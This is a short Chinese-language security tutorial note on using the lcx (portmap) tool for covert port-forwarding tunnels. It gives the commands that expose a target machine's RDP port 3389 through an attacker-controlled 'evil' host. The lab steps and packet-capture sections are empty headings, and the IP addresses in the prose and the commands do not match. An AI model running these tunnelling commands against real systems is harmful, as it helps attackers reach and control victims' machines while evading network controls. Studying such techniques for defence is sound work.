隐藏隧道通信:lcx 端口转发
郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
隐藏隧道通信:lcx 端口转发
1 lcx 端口转发原理
lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。
一个基本的 Socket 隧道必须包含两端:
- 服务端:监听一个端口,等待客户端连接
- 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h
[Usage of Packet Transmit:]
lcx.exe -<listen|tran|slave> <option> [-log logfile]
[option:]
-listen <ConnectPort> <TransmitPort>
-tran <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
2 实验环境
3 配置服务端
- 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389
4 配置客户端
- 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
- 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。
-
配置 LCX 端口转发
.\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
-
客户端与服务端建立通信连接
-
与远程主机建立远程桌面连接
-
客户端:
-
服务端:
-
-
抓包查看流量特征